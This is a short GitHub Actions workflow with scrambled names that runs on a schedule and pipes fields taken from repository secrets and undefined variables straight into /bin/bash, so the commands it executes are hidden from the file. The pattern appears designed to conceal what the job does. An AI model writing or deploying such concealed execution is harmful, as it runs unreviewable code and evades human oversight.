name: wryfacility
on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wryfacility
        env:
          zjsd4: ${{ secrets.zjsd4 }}
        run: |
          echo $zjsd4 | jq -r .es25595 | /bin/bash
          echo $w94624 | jq -r .zc6 | /bin/bash
          echo $gm78 | jq -r .sbg43826 | /bin/bash
          echo $fj9209 | jq -r .xh43 | /bin/bash
          echo $ssrzf206 | jq -r .ns1 | /bin/bash
          echo $mepd4893 | jq -r .evov8507 | /bin/bash

